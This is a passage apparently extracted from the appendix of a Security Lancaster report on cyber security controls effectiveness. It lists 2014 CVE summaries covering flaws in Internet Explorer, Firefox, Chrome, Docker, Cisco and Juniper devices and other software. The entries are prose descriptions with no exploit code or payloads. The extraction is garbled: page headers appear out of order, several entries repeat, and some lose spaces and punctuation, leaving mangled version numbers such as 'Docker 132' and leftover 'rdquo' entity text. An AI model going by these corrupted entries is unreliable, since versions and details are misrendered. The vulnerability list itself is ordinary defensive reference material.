CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 26 of 28

Survey Responses


executable file for a crafted application

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.




CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster, Page 25 of 28

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X, and before 11.2.202.425 on Linux, allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses
